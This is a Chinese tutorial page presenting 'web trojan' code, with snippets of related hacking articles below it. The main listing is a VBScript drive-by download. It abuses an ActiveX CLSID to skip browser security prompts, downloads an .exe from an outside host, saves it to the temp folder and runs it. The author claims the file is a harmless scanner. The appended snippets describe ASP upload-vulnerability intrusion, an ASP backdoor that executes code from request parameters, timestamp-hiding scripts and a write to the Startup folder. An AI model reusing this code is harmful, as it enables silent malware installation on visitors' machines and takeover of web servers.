网页木马代码例子(里面的文件是漏洞扫描器,呵呵)_木马相关

对于经常上网冲浪的朋友对于网页木马一定不会陌生,打开某个网站,莫名其妙的运行了某个木马,虽然在"Internet选项"里有"安全"设置,但是下面的代码就不会弹出任何信息就直接运行了程序,不信,follow me!
(提示: 只是了解一下技术和方法,千万别搞破坏,yexj00.exe是一个windows2000 漏洞扫描器和查漏补缺用的,不是病毒或木马,放心运行。)

复制代码 代码如下:

<script language="VBScript">
    on error resume next
    dl = "<a href="http://yexj00.5dm.cn/soft/yexj00.exe" target="_blank">http://yexj00.5dm.cn/soft/yexj00.exe</a>"
    set ye=document.createElement("object")
    yStr="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
   ye.setAttribute "classid",yStr
    Set x = ye.CreateObject("Microsoft.XMLHTTP","")
    set S = ye.createobject("ADODB.Stream","")
    S.type = 1
    x.Open "GET", dl, False
    x.Send
    fname="win2000漏洞扫描器.exe"
    set F = ye.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname= F.BuildPath(tmp,fname)
    S.open
    S.write x.responseBody
    S.savetofile fname,2
    S.close
    set A=ye.createobject("Shell.Application","")
      A.ShellExecute fname,"","",  "open",1
    </script>

时间: 2024-10-29 01:15:44

网页木马代码例子(里面的文件是漏洞扫描器,呵呵)_木马相关的相关文章

实例分析ASP上传漏洞入侵实战及扩展_木马相关

[上传漏洞欺骗技术] 网络上许多程序都有着上传漏洞,比如任我飞扬整站程序.动感购物商城.秋叶商城.惠信新闻系统等.本文主要讲解上传漏洞的入侵实战以及一些扩展利用.首先我们要获得客户端和服务器之间传递的数据,事先准备好一个ASP木马准备上传,当然不可能成功,我们要的就是这中间我们向服务器提交的数据.一般用WsockExpert来获得数据,由于数据太多只能把关键部分发出来如下: POST /bbs/upfile.asp HTTP/1.1 --. 省略了N多没用信息 Content-Length: 1

淘特ASP木马扫描器的代码_木马相关

+-----------------+ |淘特ASP木马扫描器| +-----------------+ 本程序可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序.系统采用扫描程序与病毒库分离的形式, 以后升级只需像杀毒软件那样升级病毒库就可以了.目前可以查杀所有流行的ASP木马程序. 系统提供了全站扫描.按文件夹和指定文件扫描三种扫描方式,如果网站文件比较少的话,推荐使用"全站扫描",如果文件比较多,推荐 使用按文件夹扫描.扫描过程,系统会记录

跨站脚本执行漏洞详解与防护_木马相关

本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该漏洞.由于时间仓促,水平有限,本文可能有不少错误,希望大家不吝赐教.  声明,请不要利用本文介绍的任何内容,代码或方法进行破坏,否则一切后果自负!  [漏洞成因]  原因很简单,就是因为CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换.  [漏洞形式]  这里所说的形式,实际上是指CG

隐藏修改文件时间和文件属性的ASP脚本_木马相关

复制代码 代码如下: <% '隐藏并修改文件的最后修改时间的aspshell '原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等:FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件 ' 通过shell.application可以给文件重新设置一个最后修改时间 '2009/02/24 write by skyfire response.write "<form method=post>" response.write "

JavaScript实现带自动提示的文本框效果代码_木马相关

示例一:直接编写AJAX 实现. 客户端: 复制代码 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Ajax实现自动提示的文本框</title> <st

XP系统优化和安全限制 IE相关修改方法与注册表文件第1/2页_其它相关

彻底删除 Internet Explorer  工具列表上其它图标   在[开始]-->[运行]-->键入[regedit]选[HKEY_LOCAL_MACHINE]-->[SOFTWARE]-->[Microsoft]-->[InternetExplorer]-->[Extensions],检查各数字文件夹的内容将不需要的整个文件夹删除便可. 禁止IE界面相关按钮禁用"文件"按钮  隐藏和禁用 Internet Explorer 工具栏上特定的按钮

一个较新的ASP后门服务端实现代码_木马相关

今天重新研究了下VB里面的ScriptControl组件,发现asp里面也能调用.研究了下方法,后来和lcx讨论了下.得到了如下代码,在此感谢前辈的指点,呵呵. 代码很简单,我就不多做解释了,以免有人骂我装. 复制代码 代码如下: <% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SubCode")) '参数S

跨越fso、wsh、 application写文件_木马相关

<% on error resume next dim lcxset lcx=server.CreateObject("Adodb.Stream") lcx.Open lcx.Type=2 lcx.CharSet="gb2312" lcx.LoadFromFile "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\cook.bat" lcx.Position=lcx.Size lcx

asp又一个分页的代码例子_应用技巧

一个分页代码例子 <%''本程序文件名为:Pages.asp%> <%''包含ADO常量表文件adovbs.inc,可从"\Program Files\Common Files\System\ADO"目录下拷贝%> <!--#Include File="adovbs.inc"--> <%''*建立数据库连接,这里是Oracle8.05数据库 Set conn=Server.CreateObject("ADODB.C